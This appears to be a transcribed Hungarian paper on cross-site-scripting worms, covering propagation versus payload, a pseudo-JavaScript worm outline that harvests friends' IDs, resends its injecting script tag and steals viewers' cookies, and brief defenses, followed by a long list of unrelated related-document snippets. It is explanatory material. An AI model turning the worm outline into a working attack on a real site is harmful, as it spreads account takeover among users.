XSS férgek és vírusok
|
|
- Enikő Biróné
- 8 évvel ezelőtt
- Látták:
Átírás
1 XSS férgek és vírusok 1. Bevezetés: XSS 2. Bevezetés: féreg és vírus különbség 3. Felhasználhatóság 4. Fertőzés, terjeszkedés 5. Proof of Concept 6. Eltávolítás és Védekezés
2 1. Bevezetés: XSS Ez a paper megpróbálja bemutatni az XSS re épülő férgeket, és vírusokat. A leírás megértéséhez szükséges némi XSS alapismeret, így ajánlanám az olvasó figyelmébe az előző XSS ről szóló írásom. Ennek ellenére röviden: XSS avagy Cross Site Scripting, egy injection fajta. Támadható weboldalba ártalmas kódot szúrhatunk, amivel aztán különböző technikákat hajthatunk végre. XSS eknek két jól elkülöníthető fajtája van, a perzisztens, és a non perzisztens. Mind a kettő alkalmas a férgek/vírusok terjesztésére, viszont a jobb szemléltethetőség kedvéért a perzisztens hibákkal fogunk elméletben foglalkozni. Perzisztens XSS, ha a szolgáltató tárolja egy hibából fakadóan az ártalmas kódot, Non perzisztens, amikor a szolgáltató nem tárolja a kódot, csak közvetít a fertőző és a fertőzött között. 2. Bevezetés féreg és vírus különbség Régi probléma, hogy a nagy átlag nem ismeri a különbséget a féreg és a vírusok között. Pedig nem véletlenül van különböző neve a dolognak. Vírus: olyan programkódok, amik felhasználói segítséggel terjednek, más programokat fertőznek meg. A fertőzött program más programokat fertőz meg és így tovább. Féreg: önmagától terjed, nem feltétlen szükséges hozzá emberi beavatkozás. Javascript, HTML és egyéb nyelveknek köszönhetően, mára már a web is kinőtte annyira magát, hogy ezeket az említett funkciókat elláthassa. Mind férgeket, vírusokat de akár trójaikat is írhatunk a webre, csak egy hibás alkalmazás kell hozzá.
3 3. Felhasználhatóság Tekintsünk át egy kicsit a másik (remélhetőleg a rossz) oldalra. Szeretnénk egy jól működő szociális oldal felhasználóinak védett adatait megszerezni, vagy éppen a gépükre telepíteni valamilyen ártalmas kódot (pl. bináris trójait, botnethez klienst). Keresünk egy perzisztens XSS t a szolgáltatás oldalán, erre a környezetre írunk egy kódot, amit injektálva az oldalba a hibán keresztül, bárki megnézve/lefuttatva tovább terjeszti azt. A futtatás következménye hogy a kód bármit tehet a gépünkkel, ellophatja a cookie ainkat, így bárki használni tudja a webszolgáltatást a fertőzött jogaival, vagy éppen egy böngésző vagy böngésző plugin exploitot használva átveheti az uralmat a fertőzött gép felett, így kihasználhatja az erőforrásait (pl. botnetbe kötés). 4. Fertőzés, terjeszkedés Egy XSS vírus/féreg (továbbiakban csak féreg az egyszerűség kedvéért annak ellenére, hogy tisztában vagyunk a különbségekkel), a böngészőkön át terjed. A terjedéshez nem a böngészők hiányosságait illetve hibáit használja ki, hanem a webszolgáltatásokét. A férgek két részből állnak, a propagáló kódból, és a payloadból. A propagáló kód, az a rész, ami segítségével terjednek, viszik át magukat és a payloadot a következő fertőzöttre. A payload pedig a hasznos teher, ami a tényleges kódot tartalmazza, amivel a fertőzött félnek árthatunk. A férgek nem a felhasználókat fertőzik meg alapjáraton, hanem a webszolgáltatást, vagy annak egy részét. A felhasználók a fertőzött szolgáltatást megtekintve, segítenek a további fertőzésben, új lapok, al lapok fertőzését teszik lehetővé. Pl. egy szociális hálózatra hajazó weboldalon biztos, hogy találunk üzenetküldést. Ha ez a funkció sebezhető, akkor az üzenetet megkapó felhasználó böngészője felett átvehetjük az uralmat. Lekérdezhetjük az összes ismerősét, azoknak elküldhetjük az által megkapott üzenetet, amit ha megnéznek, akkor velük is ugyanez játszódhat le. Ez a fertőzés folyamata, a propagáló kód feladata. A payload a fertőzés után rögtön megint csak a böngészőben fut le. Lehet egy szimpla visszacsatolás a kód írójához, pl. a webszolgáltatáshoz tartozó felhasználói cookie elküldése, így a privilégiumok megszerzése nagyipari módszerként, vagy egy exploit futtatása egy jól vagy kevésbé jól ismert activex plugin ellen, és máris a böngészőn kívül az egész gép a támadó kezében van, mint tiszta erőforrás.
4 5. Proof of Concept Avagy bizonyíték a létezésre. Előző hónapokban egy versenyt írtak ki XSS férgek szaporításának megvalósítására, a győztes a legkisebb méretű lett. Nem a payload volt a lényeg, hanem a szaporítás mikéntje. A verseny mutatja, hogy rendkívül sokféleképpen lehet megírni a propagáló kódot. Egy fél pszeudó javascript XSS worm implementáció, kisebb átalakítással, tökéletesen működhet: Fertőző sor: <script type="text/javascript" src=" worm.js function ismeros_kereses() iframe_letrehozas; iframe_neve.feldolgozas; // ID k kinyerése return id_tomb; function uzenet_kuldes(id) iframe_letrehozas; form_letrehozas; form_neve.inicializalas(); // ID, üzenet, method, action beállítás form_neve.submit(); // ID nek elküldi az üzenetet, aminek a tartalma a fertőző kód: // <script type="text/javascript" src="worm.js"></script> function cookie_lopas() iframe_lerehozas; iframe_neve.src=' function fertozz() i = 0; ids = ismeros_kereses(); while(ids[i]) uzenet_kuldes(ids[i++]); cookie_lopas(); document.onload = fertozz;
5 A fertőző kódot elsőként elküldve, szabadjára engedve megkezdődik a fertőzés. Az áldozat megnézi az üzeneteit, lefuttatja a megadott worm.js t, ami elősször lekérdezi az ismerőseit, majd üzenetet küld nekik, aminek a tartalma a fertőző kód. Végül a payload is lefut, ami a cookie_lopas() függvény, vagyis elküldi a támadónak az üzenetet megnéző áldozat cookie jait. 6. Eltávolítás és Védekezés Mint írtam a fertőzés nem érinti a felhasználó gépét, a böngésző, csak terjeszteni segít a férget, így eltávolítani csak a webszolgáltatásról kell, ez pedig a szolgáltató dolga. Perzisztens XSS eket pedig csak az adatbázisokból kell törölni, majd a fertőzéshez használt sebezhetőséget kijavítani. (Bővebben XSS white paper ömben). Felhasználók védekezni a fertőzés segítése ellen, böngésző kiegészítőkkel tudnak, pl Firefox hoz NoScript extension, vagy szimplán kikapcsoljuk a javascriptet. Bucsay Balázs earthquake[at]rycon[dot]hu
Számítógépes vírusok. Barta Bettina 12. B
Számítógépes vírusok Barta Bettina 12. B Vírusok és jellemzőik Fogalma: A számítógépes vírus olyan önmagát sokszorosító program,mely képes saját magát más végrehajtható alkalmazásokban, vagy dokumentumokban
Webapp (in)security. Gyakori hibákról és azok kivédéséről fejlesztőknek és üzemeltetőknek egyaránt. Veres-Szentkirályi András
Webapp (in)security Gyakori hibákról és azok kivédéséről fejlesztőknek és üzemeltetőknek egyaránt Veres-Szentkirályi András Rövid áttekintés Webalkalmazások fejlesztése során elkövetett leggyakoribb hibák
Történet. Számítógépes vírusok. Mik a vírusok? A vírusok felépítése
Számítógépes vírusok Történet 70-es években kezdődött programok, melyek olyan utasításokat tartalmaztak, amik szándékosan rongáltak, illetve hibákat okoztak. Teszteljék a számítógép terhelhetőségét Legyen
JavaScript bűvésztrükkök, avagy PDF olvasó és böngésző hackelés
JavaScript bűvésztrükkök, avagy PDF olvasó és böngésző hackelés Bemutatkozás Molnár Gábor Ukatemi Technologies IT biztonsági szakértő gmolnar@ukatemi.com Áttekintés JavaScript Firefox JS sebezhetőség Adober
Weboldalak biztonsága
Weboldalak biztonsága Kertész Gábor kertesz.gabor@arek.uni-obuda.hu Óbudai Egyetem Alba Regia Egyetemi Központ http://arek.uni-obuda.hu/~kerteszg Mi a web? Gyakori tévedés: az internet és a web nem ugyanaz!
1. Bevezető. 2. Sérülékenységek
1. Bevezető A dokumentum összefoglalja a Silent Signal Kft. szakértőinek 2011-ben elért kutatási és fejlesztési eredményeit. Ebben az időszakban munkatársaink 16 sebezhetőséget azonosítottak elterjedt
IV. Számítógépes vírusok és védekezési módszerek
IV. Számítógépes vírusok és védekezési módszerek Mi is az a VÍRUS? A számítógépes vírusok olyan programok, amelyek képesek önmagukat reprodukálni, s így szaporodni. Hogyan aktiválódnak? program használat
Adatbázisok elleni fenyegetések rendszerezése. Fleiner Rita BMF/NIK Robothadviselés 2009
Adatbázisok elleni fenyegetések rendszerezése Fleiner Rita BMF/NIK Robothadviselés 2009 Előadás tartalma Adatbázis biztonsággal kapcsolatos fogalmak értelmezése Rendszertani alapok Rendszerezési kategóriák
Vírusok. - önreprodukcióra képes, károkat okozó program
Vírusok Mi is a vírus? - Számítógép program, már a 60-as években katonai körök foglalkoztak program írással, hogy az ellenség gépeit tönkre tegyék és adatokat megszerezhessenek. - önreprodukcióra képes,
Hogy miért akarnak lehallgatni minket az lehallgatónként változik.
1 2 Hogy miért akarnak lehallgatni minket az lehallgatónként változik. Az NSA (az USA nemzeti biztonsági szolgálata) azért kívánja csökkenteni az emberek privátszféráját, mert minél többet tudnak az emberekről,
1982-ben az akkor 15 éves amerikai diák, Rich Skrenta úgy döntött, hogy megvicceli ismerőseit, ezért írt egy programot. A kilencvenes évek közepén,
6. óra Vírusok_1 Mi is a vírus? -Számítógép program, már a 60-as években katonai körök foglalkoztak program írással, hogy az ellenség gépeit tönkre tegyék és adatokat megszerezhessenek. -önreprodukcióra
Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. www.cardinal.hu
Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. www.cardinal.hu Cardinal Kft., Gyimesi István 2007. 1 Hova fejlődött az Internet az elmúlt 10 évben? Kommunkációs protokollok A web nyelve
The banking Trojan Zeus. Készítette: Nagy Attila
The banking Trojan Zeus Készítette: Nagy Attila 1 Tartalom Áttekintés Zeus működése Man in the mobile A mai álláspont 2 Tartalom Áttekintés A Zeus működése Man in the mobile A mai álláspont 3 Trójai faló
5-ös lottó játék. Felhasználói dokumentáció
5-ös lottó játék Felhasználói dokumentáció Feladat: JavaScript és CSS segítségével 5-ös lottó játék készítése. Futtatási környezet: A http://10.0.0.101/~szabby/ linkre kattintva megjelenik az oldal. Az
Memória játék. Felhasználói dokumentáció
Memória játék Felhasználói dokumentáció Feladat: JavaScript segítségével, olyan programot írni, mely összekeveri a lapokat, majd a felhasználónak kell párosítani. HTML oldalba ágyazva és CSS-el formázva.
Weboldalak Biztonsági Kérdései
Weboldalak Biztonsági Kérdései Kliens szerver modellek Kliens szerver modellek Offline világ Online világ és a programokkal szemben támasztott elvárások helyett... Fejlesztés üteme gyors Előregyártott
Szabadkai Műszaki Szakfőiskola. Web programozás. dr Zlatko Čović chole@vts.su.ac.rs
Szabadkai Műszaki Szakfőiskola Web programozás dr Zlatko Čović chole@vts.su.ac.rs 1 DOM események (events) JavaScriptben interaktív programok készítésére az események által vezérelt programozási modellt
Sakk játék. Feladat: JavaScript segítségével olyan programot kell írni, ami egy sakktáblát szimulál. Kiválasztásra változtatják a helyüket.
Sakk játék Felhasználói dokumentáció Feladat: JavaScript segítségével olyan programot kell írni, ami egy sakktáblát szimulál. Kiválasztásra változtatják a helyüket. Futtatási környezet: A http://10.0.0.101/~hgy/sakk/
Felhasználói kézikönyv. Verzió: 1.01
Felhasználói kézikönyv Verzió: 1.01 Tartalomjegyzék Általános áttekintés 3 A DocGP rendszer célja 3 A rendszer által biztosított szolgáltatások 3 A felhasználói felület elérése 3 JAVA JRE telepítése 3
Web service fenyegetések e- közigazgatási. IT biztonsági tanácsadó
Web service fenyegetések e- közigazgatási környezetben Krasznay Csaba IT biztonsági tanácsadó HP Magyarország Kft. Bevezetése etés A Magyar Köztársaság elektronikus közigazgatási rendszere az elmúlt években
Felhasználói kézikönyv
Felhasználói kézikönyv Titkositott.email - Thunderbird levelező www.titkositott.email 2 Bevezető Thunderbird levelező beállítása A felhasználói kézikönyv abban segít, hogy a titkositott.email weboldalon
Silent Signal Kft. Webáruházak informatikai biztonsága Veres-Szentkirályi András 2011.03.04. 2011.03.04 Marketingtorta - 4 1
Silent Signal Kft. Webáruházak informatikai biztonsága Veres-Szentkirályi András 2011.03.04. 2011.03.04 Marketingtorta - 4 1 Témáink Bevezető Webáruház, mint IT rendszer biztonsága OWASP TOP10 webes hiba
A támadók gondolkodásmódjának változása egy banki malware evolúciójának tükrében
W H E R E T H E M O N E Y W A S A támadók gondolkodásmódjának változása egy banki malware evolúciójának tükrében Sándor Fehér CEO of White Hat IT Security IT security manager R Ó L A M Visiting lecturer
Sakk-játék. Bármilyen számítógépen működik, amin található böngésző és Java alkalmazás. Indító képernyő
Felhasználói dokumentáció Sakk-játék Feladat: JavaScript és CSS segítségével sakk-játék készítése. Futtatási környezet: A http://10.0.0.101/~szabby/ linkre kattintva megjelenik az oldal. Az oldal megtekintéséhez
Kezdő lépések. Céges email. Tartalom
Kezdő lépések Céges email Tartalom 1. Bevezetés...2 2. A szolgáltatás elérése és alapbeállításai...3 3. Ismerkedés a levelezővel...6 4. A levelező beállításai...8 5. Naptár... 10 6. Névjegyek... 11 7.
A jquery.clickheat egy jquery plugin, ami lekezeli a kattintásokat a kijelölt tartományban. jquery.clickheat
A jquery.clickheat egy jquery plugin, ami lekezeli a kattintásokat a kijelölt tartományban. jquery.clickheat Egy kijelölt terültet vagy az egész dokumentumon lekezeli a kattintásokat, majd egy AJAX (GET)
Vírusok és kártékony programok A vírus fogalma, típusai Vírusirtás Védelem
Vírusok és kártékony programok A vírus fogalma, típusai Vírusirtás Védelem A vírus fogalma A vírus önreprodukáló, károkozó program, amely beépül más állományokba Károkozás: Gép feltűnő lelassulása Fájlok
ECDL Információ és kommunikáció
1. rész: Információ 7.1 Az internet 7.1.1 Fogalmak és szakkifejezések 7.1.2 Biztonsági megfontolások 7.1.3 Első lépések a webböngésző használatában 7.1.4 A beállítások elévégzése 7.1.1.1 Az internet és
Az Educatio weboldalain elhelyezhető hirdetések technikai paraméterei
Az Educatio weboldalain elhelyezhető hirdetések technikai paraméterei Az Educatio Társadalmi Szolgáltató Nonprofit Kft. a következő feltételek szerint készült bannerek elhelyezését vállalja weboldalain:
telepítési útmutató K&H Bank Zrt.
K&H Bank Zrt. 1095 Budapest, Lechner Ödön fasor 9. telefon: (06 1) 328 9000 fax: (06 1) 328 9696 Budapest 1851 www.kh.hu bank@kh.hu telepítési útmutató K&H e-bank Budapest, 2015. március 09. K&H e-bank
Web programozás. 3. előadás
Web programozás 3. előadás Űrlapok form label for input type select, option value szöveges mező: text textarea jelszó: password rádiógomb: radio jelölőnégyzet: checkbox küldés gomb: submit Web programozás
ELEKTRONIKUS MUNKABÉRJEGYZÉK MODUL
ELEKTRONIKUS MUNKABÉRJEGYZÉK MODUL nexonbér elektronikus munkabérjegyzék modul Kiszámolta már valaha, hogy mennyibe kerül egyetlen munkavállaló egyetlen havi munkabérjegyzéke (a nyomtatás, a borítékolás
Elektronikus levelek. Az informatikai biztonság alapjai II.
Elektronikus levelek Az informatikai biztonság alapjai II. Készítette: Póserné Oláh Valéria poserne.valeria@nik.bmf.hu Miről lesz szó? Elektronikus levelek felépítése egyszerű szövegű levél felépítése
Jquery. Konstantinusz Kft.
Konstantinusz Kft. 2011 1 Tartalomjegyzék 1 Tartalomjegyzék... 2 2 Bevezetés... 3 3 Használata... 4 3.1 A $ függvény... 4 3.2 Elemek kiválasztása... 5 3.3 Fontosabb függvények... 6 3.3.1 Animációk... 7
Flex: csak rugalmasan!
Flex: csak rugalmasan! Kiss-Tóth Marcell http://kiss-toth.hu marcell@kiss-toth.hu Magyarországi Web Konferencia 2006 2006. március 18. tartalom bevezető Adobe Flex alternatív technológiák bevezető az Internetnek
AVG. vírusirtó programok
vírusirtó programok leírása 1 TARTALOM AVG AVG Identity Protection 8.5... 3 AVG Anti-Virus 8.5... 4 AVG Anti-Virus+Tűzfal 8.5... 6 AVG Internet Security 8.5... 8 AVG Internet Security Home3 8.5... 10 2
Felhasználói kézikönyv
Felhasználói kézikönyv Titkositott.email - MS Outlook levelező www.titkositott.email 2 Bevezető MS Outlook levelező beállítása A felhasználói kézikönyv abban segít, hogy a titkositott.email weboldalon
Kétcsatornás autentikáció
Kétcsatornás autentikáció Az internet banking rendszerek biztonságának aktuális kérdései Gyimesi István, fejlesztési vezető, Cardinal Kft. Az előző részek tartalmából... E-Banking Summit 2012, Cardinal
A CAPICOM ActiveX komponens telepítésének és használatának leírása Windows7 operációs rendszer és Internet Explorer 8-es verziójú böngésző esetén
A CAPICOM ActiveX komponens telepítésének és használatának leírása Windows7 operációs rendszer és Internet Explorer 8-es verziójú böngésző esetén Tartalomjegyzék 1. A CAPICOM ACTIVEX KOMPONENS TELEPÍTÉSE...3
Útmutató az ActiveX valamit az Internet Explorer egyéb beállításaihoz. Windows 7, 8, 8.1 és 10 operációs rendszerekhez
Útmutató az ActiveX valamit az Internet Explorer egyéb beállításaihoz Windows 7, 8, 8.1 és 10 operációs rendszerekhez 1 Tartalomjegyzék 1 Bevezető... 3 2 Támogatott operációs rendszerek és internet böngészők...
Miért kell a nyuszimat vakcinázni?
Miért kell a nyuszimat vakcinázni? A mixomatózis és a nyulak vérzéses betegsége (RHD- Rabbit Haemorrhagic Disease) két akár halálos kimenetelû (de megelôzhetô) fertôzô betegség, amely a nyulakat veszélyezteti.
Drupal biztonság. Tuesday, April 3, 12
Drupal biztonság Ki célpont? mi nem vagyunk célpontok Az adatok értékesek (pl. tematizált email címlista az {user} táblából) A látogatók értékesek Minden gép számít (botnetek) Vandálkodni jó :) Ki célpont?
Bevezetés Működési elv AJAX keretrendszerek AJAX
AJAX Áttekintés Bevezetés Működési elv AJAX-ot támogató keretrendszerek Áttekintés Bevezetés Működési elv AJAX-ot támogató keretrendszerek Áttekintés Bevezetés Működési elv AJAX-ot támogató keretrendszerek
Informatikai biztonság alapjai
Informatikai biztonság alapjai 3. Rosszindulatú programok Pethő Attila 2008/9 II. félév Rosszindulatú programok (malware) fajtái vírusok, férgek, trójaiak, spyware, dishonest adware, crimeware, stb. Vírusok
Webszolgáltatások (WS)
Webszolgáltatások (WS) Webszolgáltatások fogalma IBM (lényege) Egy interface, mely a hálózaton keresztül szabványos XML üzenetekkel érhető el és hozzá formálsi XML leírás tartozik. (soap, wsdl) Sun Szoftverelemek,
Korszerű webes technológiák felhasználása a Moodle LMS rendszerben
Korszerű webes technológiák felhasználása a Moodle LMS rendszerben Vágvölgyi Csaba (vagvolgy@kfrtkf.hu) Papp Gyula (pappgy@kfrtkf.hu) Kölcsey Ferenc Református Tanítóképző Főiskola Debrecen Néhány adat
Webes alkalmazások fejlesztése 1. előadás. Webes alkalmazások és biztonságuk
Eötvös Loránd Tudományegyetem Informatikai Kar Webes alkalmazások fejlesztése 1. előadás Webes alkalmazások és biztonságuk 2014.02.10. Giachetta Roberto groberto@inf.elte.hu http://people.inf.elte.hu/groberto
Szolgáltatási csomagok I-SZERVIZ Kft. érvényes 2008. szeptember 1-től
Szolgáltatási csomagok I-SZERVIZ Kft. érvényes 2008. szeptember 1-től HomeWeb csomagok Ha Ön szeretné családjával megosztani fotóit, vagy valamilyen családi eseményt szeretne egyszerű weboldalon megmutatni
Adja meg, hogy ebben az esetben mely handshake üzenetek kerülnek átvitelre, és vázlatosan adja meg azok tartalmát! (8p)
Adatbiztonság a gazdaságinformatikában PZH 2013. december 9. 1. Tekintsük a következő rejtjelező kódolást: nyílt üzenetek halmaza {a,b}, kulcsok halmaza {K1,K2,K3,K4,K5}, rejtett üzenetek halmaza {1,2,3,4,5}.
HTML. Ismerkedés a JavaScripttel. A JavaScript lehet ségei. A JavaScript kód helye. Önálló JavaScript fájlok
HTML Ismerkedés a JavaScripttel webprogramozó A weblapokat HTML nyelven készíthetjük el. A HTML egyszer leírónyelv, nem alkalmas válaszolni a felhasználóknak, nem tud döntéseket hozni, nem tud végrehajtani
SZÁMÍTÓGÉPES KÁRTEVŐK (MALWARE)
SZÁMÍTÓGÉPES KÁRTEVŐK (MALWARE) Számítógépes kártevők A rosszindulatú számítógépes programokat összefoglalóan kártevőknek (angolul malware, ejtsd melver) nevezzük. A kártevők típusai: Vírusok Férgek Kémprogramok
Allianz Titkosított Szolgáltatási Rendszer FAQ - Segítség a rendszer használatához
Allianz Titkosított E-mail Szolgáltatási Rendszer FAQ - Segítség a rendszer használatához V2.05 Tartalomjegyzék Általános hibák... 2 Nem találom a kezdeti jelszavamat tartalmazó levelet... 2 Elfelejtettem
Mértékegységek a számítástechnikában
Mértékegységek a számítástechnikában BIT legkisebb adattárolási egység Értékei lehetnek: 0,1. Bájt= 8 BIT a számítógép számára egységesen kezelhető legkisebb egység. (Bit,) Bájt, KiloBájt, MegaBájt, GigaBájt,
BIRDIE. Business Information Reporter and Datalyser. Előadó: Schneidler József
BIRDIE Business Information Reporter and Datalyser Előadó: Schneidler József BIRDIE RIPORT RIPORT KÉSZÍTŐ ÉS ÉS TERJESZTŐ RENDSZER A Daten-Kontor Kft. saját fejlesztésű dobozos alkalmazása A BIRDIE célja:
Tili-Toli játék. Felhasználói dokumentáció
Tili-Toli játék Felhasználói dokumentáció Feladat: JavaScript és CSS segítségével tili-toli játék készítése. Futtatási környezet: A http://10.0.0.101/~szabby/ linkre kattintva megjelenik az oldal. Az oldal
Digitális aláíró program telepítése az ERA rendszeren
Digitális aláíró program telepítése az ERA rendszeren Az ERA felületen a digitális aláírásokat a Ponte webes digitális aláíró program (Ponte WDAP) segítségével lehet létrehozni, amely egy ActiveX alapú,
Számológép. Bármilyen számítógépen működik, amin található böngésző és Java alkalmazás. Indító képernyő
Felhasználói dokumentáció Számológép Feladat: JavaScript és CSS segítségével számológép készítése. Futtatási környezet: A http://10.0.0.101/~szabby/szgep.html linkre kattintva megjelenik az oldal. Az oldal
Alapfogalmak. Biztonság. Biztonsági támadások Biztonsági célok
Alapfogalmak Biztonság Biztonsági támadások Biztonsági célok Biztonsági szolgáltatások Védelmi módszerek Hálózati fenyegetettség Biztonságos kommunikáció Kriptográfia SSL/TSL IPSec Támadási folyamatok
DSD W3C WAI, avagy Weblapok akadálymentesítése
W3C WAI, avagy Weblapok akadálymentesítése Pataki Máté Témakörök A World Wide Web Consortium (W3C) W3C Magyar Iroda W3C - Web Accessibility Initiative (WAI) WCAG 1.0 Célcsoportok Fogyatékossággal élők
Útmutató az integrációhoz
Útmutató az integrációhoz 1. Adatkinyerés integráció A Springtab integrálás folyamatát vesszük most végig egy meglévő (de FB kliens oldali integráció nélküli) weboldalon. 1.1 Facebook alkalmazás létrehozása
Google App Engine az Oktatásban 1.0. ügyvezető MattaKis Consulting http://www.mattakis.com
Google App Engine az Oktatásban Kis 1.0 Gergely ügyvezető MattaKis Consulting http://www.mattakis.com Bemutatkozás 1998-2002 között LME aktivista 2004-2007 Siemens PSE mobiltelefon szoftverfejlesztés,
Pénzügyi algoritmusok
Pénzügyi algoritmusok A C++ programozás alapjai Tömbök (3. rész) Konstansok Kivételkezelés Tömbök 3. Többdimenziós tömbök Többdimenziós tömbök int a; Többdimenziós tömbök int a[5]; Többdimenziós tömbök
A Zotero hivatkozáskezelő program bemutatása. Mátyás Melinda
A Zotero hivatkozáskezelő program bemutatása Mátyás Melinda Mire használható a Zotero? A Zotero egy ingyenes hivatkozáskezelő program Különböző internetes oldalakról, adatbázisokból tudjuk kinyerni a megjelenített
Adatbázis kezelő szoftverek biztonsága. Vasi Sándor G-3S
Adatbázis kezelő szoftverek biztonsága Vasi Sándor sanyi@halivud.com G-3S8 2006. Egy kis ismétlés... Adatbázis(DB): integrált adatrendszer több különböző egyed előfordulásainak adatait adatmodell szerinti
Kezdő lépések Outlook Web Access
Kezdő lépések Outlook Web Access A Central Europe On-Demand Zrt. által, a Telenor Magyarország Zrt. ügyfelei részére nyújtott szolgáltatások rövid kezelési útmutatója Tartalom Bevezetés... 3 Rendszerkövetelmények...
BEVEZETÉS AZ INTERNET ÉS A WORLD WIDE WEB VILÁGÁBA. Kvaszingerné Prantner Csilla, EKF
BEVEZETÉS AZ INTERNET ÉS A WORLD WIDE WEB VILÁGÁBA Kvaszingerné Prantner Csilla, EKF Az Internet 2 A hálózatok összekapcsolt, hálózatba szervezett rendszere, amely behálózza a világot. Részévé vált életünknek.
Tisztelt Felhasználó!
Tisztelt Felhasználó! Az alábbiakban az NB termékek 3D modelljeinek generálása, használata kerül bemutatásra. A webes felület használatához regisztráció nem szükséges! Tartalomjegyzék Belépés... 2 Szükséges
Az iskolai rendszerű képzésben az összefüggő szakmai gyakorlat időtartama. 10. évfolyam Adatbázis- és szoftverfejlesztés gyakorlat 50 óra
Az iskolai rendszerű képzésben az összefüggő szakmai gyakorlat időtartama 10. évfolyam: 105 óra 11. évfolyam: 140 óra 10. évfolyam Adatbázis- és szoftverfejlesztés gyakorlat 50 óra 36 óra OOP 14 óra Programozási
Webkezdő. A modul célja
Webkezdő A modul célja Az ECDL Webkezdő modulvizsga követelménye (Syllabus 1.5), hogy a jelölt tisztában legyen a Webszerkesztés fogalmával, és képes legyen egy weboldalt létrehozni. A jelöltnek értenie
A magyar elektronikus közigazgatási rendszer biztonsági analízise. Krasznay Csaba, Szigeti Szabolcs BME Informatikai Központ
A magyar elektronikus közigazgatási rendszer biztonsági analízise Krasznay Csaba, Szigeti Szabolcs BME Informatikai Központ Tartalom A Közigazgatási Eljárási Törvény és végrehajtási rendeletei Fogalmak
Webes alkalmazások fejlesztése 1. előadás. Webes alkalmazások és biztonságuk. Cserép Máté
Eötvös Loránd Tudományegyetem Informatikai Kar Webes alkalmazások fejlesztése 1. előadás Webes alkalmazások és biztonságuk Cserép Máté mcserep@inf.elte.hu http://mcserep.web.elte.hu Kommunikáció Alkalmazások
Bevezetés a Python programozási nyelvbe
Bevezetés a Python programozási nyelvbe 8. Gyakorlat modulok random számok (utolsó módosítás: 2017. aug. 3.) Szathmáry László Debreceni Egyetem Informatikai Kar 2017-2018, 1. félév Modulok Amint a programunk
DINA elektronikus napló felhasználói kézikönyv szülőknek
DINA elektronikus napló felhasználói kézikönyv szülőknek A Belvárosi Általános Iskola és Gimnázium a 2011/2012-es tanév kezdetével (2011. szeptember 1 jétől) bevezette a DINA elektronikus osztálynaplót.
PHP alapjai, bevezetés. Vincze Dávid Miskolci Egyetem, IIT
alapjai, bevezetés Vincze Dávid Miskolci Egyetem, IIT vincze.david@iit.uni-miskolc.hu PHP Personal Home Page (Tools) Script nyelv -> interpretált Elsősorban weboldal (dinamikus) tartalmak előállítására
Tartalom. A JavaScript haladó lehet ségei. Megjelenés. Viselkedés. Progresszív fejlesztés. A progresszív fejlesztés alapelvei
Tartalom A JavaScript haladó lehet ségei webprogramozó A szöveg, amit a látogató az oldalainkon olvashat Szövegként írjuk meg HTML elemekkel osztjuk egységekre Megjelenés A szöveg kinézete és elrendezése
COOKIE (SÜTI) SZABÁLYZAT
COOKIE (SÜTI) SZABÁLYZAT A GrandVision Hungary Kft. (székhely: 1113 Budapest, Bocskai út 134-146. cégjegyzékszám: 01-09-468765.) (továbbiakban: Adatkezelő) által üzemeltetetett www.ofotert.hu oldalon (továbbiakban:
Ficsor Lajos Általános Informatikai Tanszék Miskolci Egyetem
A Java EE 5 platform Ficsor Lajos Általános Informatikai Tanszék Miskolci Egyetem Utolsó módosítás: 2008. 04. 17. A Java EE 5 platform A Java EE 5 plattform A J2EE 1.4 után következő verzió. Alapvető továbbfejlesztési
S&T CAD/PLM SuperUser Akadémia 2016
S&T CAD/PLM SuperUser Akadémia 2016 Windchill kérdezz-felelek Kérdések és válaszok a tudás teljes megosztásáig avagy kezdődik az adok-kapok Lisznyai Klára PLM tanácsadó és projektvezető S&T Consulting
Heppen Szolgáltató Kft. Adatkezelési tájékoztató a weboldalon elhelyezett sütik használatáról
Heppen Szolgáltató Kft Adatkezelési tájékoztató a www.heppen.hu weboldalon elhelyezett sütik használatáról Adatkezelő adatai Az alábbi Társaság a jelen adatkezelési tájékoztatóban ( Tájékoztató ) foglalt
Objektumorientált programozás
JavaScript Objektumorientált programozás böngésző jó néhány objektumot bocsájt a rendelkezésünkre tulajdonságok var txt="hello World!" document.write(txt.length) Web programozás I. - Kecskeméti Fõiskola
TRBOnet Térinformatikai terminál és diszpécseri konzol
TRBOnet Térinformatikai terminál és diszpécseri konzol A TRBOnet egy kliens szerver diszpécser szoftver MOTOTRBO rádiók száméra. A TRBOnet szoftver jól alkalmazható a MOTOTRBO rádiós rendszereknél. A szoftver
Web programoz as 2009 2010
Web programozás 2009 2010 Áttekintés A web rövid története Kliens szerver architektúra Néhány alapfogalom Kliens- illetve szerver oldali technológiák áttekintése Áttekintés: miről lesz szó (kurzus/labor/vizsga)
1. tétel: A kommunikációs folyamat
1. tétel: A kommunikációs folyamat 1. Határozza meg az információ és az adat fogalmát, mutasson példát a kettő különbségére! 2. Beszéljen az információ és az adat mennyiségi jellemzésének módjáról, a használt
ERserver. iseries. Az iseries Access for Windows használatának megkezdése
ERserver iseries Az iseries Access for Windows használatának megkezdése ERserver iseries Az iseries Access for Windows használatának megkezdése ii iseries: Az iseries Access for Windows használatának
Tájékoztató az 1.10-es labor használatához
Tájékoztató az 1.10-es labor használatához Általános leírás A kari nyílt laborban vékony kliens alapú architektúrát alakítottunk ki, ahol egy-két alapvető alkalmazáson kívül (pl.: böngésző, PDF olvasó,
Adatbiztonság PPZH 2011. május 20.
Adatbiztonság PPZH 2011. május 20. 1. Mutassa meg, hogy a CBC-MAC kulcsolt hashing nem teljesíti az egyirányúság követelményét egy a k kulcsot ismerő fél számára, azaz tetszőleges MAC ellenőrzőösszeghez
A legjobb márkás vírusirtók ingyen
A legjobb márkás vírusirtók ingyen A hamis vírusirtók dömpingje közepette biztonságot jelent, ha márkás antivírust veszünk. Még jobb, ha márkás és ingyen is van. Erre mutatunk néhány példát. A csaló védelmi
1. tétel: A kommunikációs folyamat
1. tétel: A kommunikációs folyamat 1. Határozza meg az információ és az adat fogalmát, mutasson példát a kettő különbségére! 2. Beszéljen az információ és az adat mennyiségi jellemzésének módjáról, a használt
DHA VÉDELMI RENDSZER EREDMÉNYEINEK STATISZTIKAI VIZSGÁLATA
DHA VÉDELMI RENDSZER EREDMÉNYEINEK STATISZTIKAI VIZSGÁLATA Laboratory of Cryptography and System Security (CrySyS) Híradástechnika Tanszék Budapesti Műszaki és Gazdaságtudományi Egyetem (szabog@crysys.hu)
Web-fejlesztés NGM_IN002_1
